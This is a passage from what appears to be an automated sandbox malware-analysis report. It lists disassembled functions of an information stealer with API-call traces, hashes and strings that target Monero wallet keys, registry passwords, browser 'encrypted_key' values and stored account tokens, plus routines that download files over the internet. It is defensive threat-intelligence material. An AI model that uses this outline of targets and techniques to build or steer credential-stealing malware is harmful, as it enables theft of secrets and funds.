                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: dbbaff060f0de59fd1315cbabd59a011a26639c0050baf1e18143398baff8309
                          • Instruction ID: 58ae037bfce5b0ae74362fefb283299965325349d8528e0ef4b674b7c6ff7fc4
                          • Opcode Fuzzy Hash: dbbaff060f0de59fd1315cbabd59a011a26639c0050baf1e18143398baff8309
                          • Instruction Fuzzy Hash: C8C169B5A002199BCB14EF64DC89FDA77B8BB64304F1045D9F50AA72C1DB70EA85CFA1
                          Function 00B04280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B08DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B08E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00B042EC
                          • lstrcat.KERNEL32(?,018AF3E0), ref: 00B0430B
                          • lstrcat.KERNEL32(?,?), ref: 00B0431F
                          • lstrcat.KERNEL32(?,018AD7F0), ref: 00B04333
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B08D90: GetFileAttributesA.KERNEL32(00000000,?,00AF1B54,?,?,00B1564C,?,?,00B10E1F), ref: 00B08D9F
                            • Part of subcall function 00AF9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00AF9D39
                            • Part of subcall function 00AF99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AF99EC
                            • Part of subcall function 00AF99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AF9A11
                            • Part of subcall function 00AF99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00AF9A31
                            • Part of subcall function 00AF99C0: ReadFile.KERNEL32(000000FF,?,00000000,00AF148F,00000000), ref: 00AF9A5A
                            • Part of subcall function 00AF99C0: LocalFree.KERNEL32(00AF148F), ref: 00AF9A90
                            • Part of subcall function 00AF99C0: CloseHandle.KERNEL32(000000FF), ref: 00AF9A9A
                            • Part of subcall function 00B093C0: GlobalAlloc.KERNEL32(00000000,00B043DD,00B043DD), ref: 00B093D3
                          • StrStrA.SHLWAPI(?,018AF350), ref: 00B043F3
                          • GlobalFree.KERNEL32(?), ref: 00B04512
                            • Part of subcall function 00AF9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AF4EEE,00000000,00000000), ref: 00AF9AEF
                            • Part of subcall function 00AF9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00AF4EEE,00000000,?), ref: 00AF9B01
                            • Part of subcall function 00AF9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AF4EEE,00000000,00000000), ref: 00AF9B2A
                            • Part of subcall function 00AF9AC0: LocalFree.KERNEL32(?,?,?,?,00AF4EEE,00000000,?), ref: 00AF9B3F
                          • lstrcat.KERNEL32(?,00000000), ref: 00B044A3
                          • StrCmpCA.SHLWAPI(?,00B108D1), ref: 00B044C0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00B044D2
                          • lstrcat.KERNEL32(00000000,?), ref: 00B044E5
                          • lstrcat.KERNEL32(00000000,00B10FB8), ref: 00B044F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                          • String ID:
                          • API String ID: 3541710228-0
                          • Opcode ID: 67f9890dd4bef2c972ed8a92cc53072a8dc0ddb495a52b7c6f09d08c238d0a17
                          • Instruction ID: fa8e5c68874576f85c0868160b0eed679bb71d4b40204a9eba935b70d47dbb76
                          • Opcode Fuzzy Hash: 67f9890dd4bef2c972ed8a92cc53072a8dc0ddb495a52b7c6f09d08c238d0a17
                          • Instruction Fuzzy Hash: BD7144B6A00208ABDB14FBA4DC85FEE77B9AB48300F0045D8F64597191EB75DB49CFA1
                          Function 00AF1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AF12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AF12B4
                            • Part of subcall function 00AF12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00AF12BB
                            • Part of subcall function 00AF12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00AF12D7
                            • Part of subcall function 00AF12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00AF12F5
                            • Part of subcall function 00AF12A0: RegCloseKey.ADVAPI32(?), ref: 00AF12FF
                          • lstrcat.KERNEL32(?,00000000), ref: 00AF134F
                          • lstrlen.KERNEL32(?), ref: 00AF135C
                          • lstrcat.KERNEL32(?,.keys), ref: 00AF1377
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                            • Part of subcall function 00B08B60: GetSystemTime.KERNEL32(00B10E1A,018AEBF0,00B105AE,?,?,00AF13F9,?,0000001A,00B10E1A,00000000,?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B08B86
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00AF1465
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                            • Part of subcall function 00AF99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AF99EC
                            • Part of subcall function 00AF99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AF9A11
                            • Part of subcall function 00AF99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00AF9A31
                            • Part of subcall function 00AF99C0: ReadFile.KERNEL32(000000FF,?,00000000,00AF148F,00000000), ref: 00AF9A5A
                            • Part of subcall function 00AF99C0: LocalFree.KERNEL32(00AF148F), ref: 00AF9A90
                            • Part of subcall function 00AF99C0: CloseHandle.KERNEL32(000000FF), ref: 00AF9A9A
                          • DeleteFileA.KERNEL32(00000000), ref: 00AF14EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                          • API String ID: 3478931302-218353709
                          • Opcode ID: f7d717b590dc2b2fa2dd7e6340504c8e0ca432290549127938a2dccd713843d9
                          • Instruction ID: ad9cabf4555c5163a99ed35bbaf6debbeae8c7d44d5c922c6c181c1479967bc5
                          • Opcode Fuzzy Hash: f7d717b590dc2b2fa2dd7e6340504c8e0ca432290549127938a2dccd713843d9
                          • Instruction Fuzzy Hash: 3D5121B1D5031997CB15FB60DD92FED77BCAB54300F4045E8B60AA20D1EE705B89CBA6
                          Function 00AF75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AF72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00AF733A
                            • Part of subcall function 00AF72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00AF73B1
                            • Part of subcall function 00AF72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00AF740D
                            • Part of subcall function 00AF72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00AF7452
                            • Part of subcall function 00AF72D0: HeapFree.KERNEL32(00000000), ref: 00AF7459
                          • lstrcat.KERNEL32(00000000,00B117FC), ref: 00AF7606
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00AF7648
                          • lstrcat.KERNEL32(00000000, : ), ref: 00AF765A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00AF768F
                          • lstrcat.KERNEL32(00000000,00B11804), ref: 00AF76A0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00AF76D3
                          • lstrcat.KERNEL32(00000000,00B11808), ref: 00AF76ED
                          • task.LIBCPMTD ref: 00AF76FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                          • String ID: :
                          • API String ID: 2677904052-3653984579
                          • Opcode ID: 17b6753de447f4b4cdf2019a3a0cbf51ea2286610bc5a293e4f9ed9aa9a09146
                          • Instruction ID: b7fb4a1bfba5129443c6b6bc45dbe9e0d38e8a33207230ab4d3ff89a79aae206
                          • Opcode Fuzzy Hash: 17b6753de447f4b4cdf2019a3a0cbf51ea2286610bc5a293e4f9ed9aa9a09146
                          • Instruction Fuzzy Hash: 7D314C71A00209DFCB44EBF8DD96DFE77B8BB44301B144558F202E72A1DA35A946DB61
                          Function 00AF60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                            • Part of subcall function 00AF47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AF4839
                            • Part of subcall function 00AF47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AF4849
                          • InternetOpenA.WININET(00B10DF7,00000001,00000000,00000000,00000000), ref: 00AF610F
                          • StrCmpCA.SHLWAPI(?,018AFBE0), ref: 00AF6147
                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00AF618F
                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00AF61B3
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 00AF61DC
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00AF620A
                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00AF6249
                          • InternetCloseHandle.WININET(?), ref: 00AF6253
                          • InternetCloseHandle.WININET(00000000), ref: 00AF6260
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                          • String ID:
                          • API String ID: 2507841554-0
                          • Opcode ID: acfa47b9cf15b0efaa8eac80020cb73298953d92f8c6df1dfe47e30a96176116
                          • Instruction ID: 9eeb897f49c6258203b949d14332194cd60c31afb61797608ace7e815f4199b0
                          • Opcode Fuzzy Hash: acfa47b9cf15b0efaa8eac80020cb73298953d92f8c6df1dfe47e30a96176116
                          • Instruction Fuzzy Hash: BB513FB1A0031CABDB20DF94DC49BEE77B8EB44701F108598B705A72C1DB75AA85CFA5
                          Function 00AF72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00AF733A
                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00AF73B1
                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00AF740D
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00AF7452
                          • HeapFree.KERNEL32(00000000), ref: 00AF7459
                          • task.LIBCPMTD ref: 00AF7555
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeOpenProcessValuetask
                          • String ID: Password
                          • API String ID: 775622407-3434357891
                          • Opcode ID: abfde678ff1902ed890d3c9b3f3648a4564033cb724e80eaa9903c4f64f124ab
                          • Instruction ID: dbbfebc7d0a6b08aa297cde6630ff530cc84daf29092d9b64524505375f0019a
                          • Opcode Fuzzy Hash: abfde678ff1902ed890d3c9b3f3648a4564033cb724e80eaa9903c4f64f124ab
                          • Instruction Fuzzy Hash: 66611BB590426C9BDB24DB94DD41BEAB7B8BF44300F0081E9F689A6181DB745BC9CFA1
                          Function 00AFBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                          • lstrlen.KERNEL32(00000000), ref: 00AFBC9F
                            • Part of subcall function 00B08E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B08E52
                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 00AFBCCD
                          • lstrlen.KERNEL32(00000000), ref: 00AFBDA5
                          • lstrlen.KERNEL32(00000000), ref: 00AFBDB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                          • API String ID: 3073930149-1079375795
                          • Opcode ID: 85854048a91a47817482815d657fe67cc50f87edeab87f6e3bc4fdd916f561a5
                          • Instruction ID: 77c2235888b7e95894155bb44bcda8fefbb4e5f14ee774ae297ffca27449d213
                          • Opcode Fuzzy Hash: 85854048a91a47817482815d657fe67cc50f87edeab87f6e3bc4fdd916f561a5
                          • Instruction Fuzzy Hash: A3B10071910308ABDB04FBA4DD96EEE77B8AF54300F404999F506B61D1EF34AA49CB72
                          Function 00B06770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess$DefaultLangUser
                          • String ID: *
                          • API String ID: 1494266314-163128923
                          • Opcode ID: af39321ef50b2be7f2329ba22f7ac36a399cb9a0717abc79306f25bee92429f6
                          • Instruction ID: 2668bd5943b2e824482fc4102b42a53d1905a030ca1942abe77f8058f96b66e5
                          • Opcode Fuzzy Hash: af39321ef50b2be7f2329ba22f7ac36a399cb9a0717abc79306f25bee92429f6
                          • Instruction Fuzzy Hash: 73F05E72A04309EFD3449FE8E94972C7B70FB04703F040199E649C6390DA704F519BE6
                          Function 00AF4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00AF4FCA
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF4FD1
                          • InternetOpenA.WININET(00B10DDF,00000000,00000000,00000000,00000000), ref: 00AF4FEA
                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00AF5011
                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00AF5041
                          • InternetCloseHandle.WININET(?), ref: 00AF50B9
                          • InternetCloseHandle.WININET(?), ref: 00AF50C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
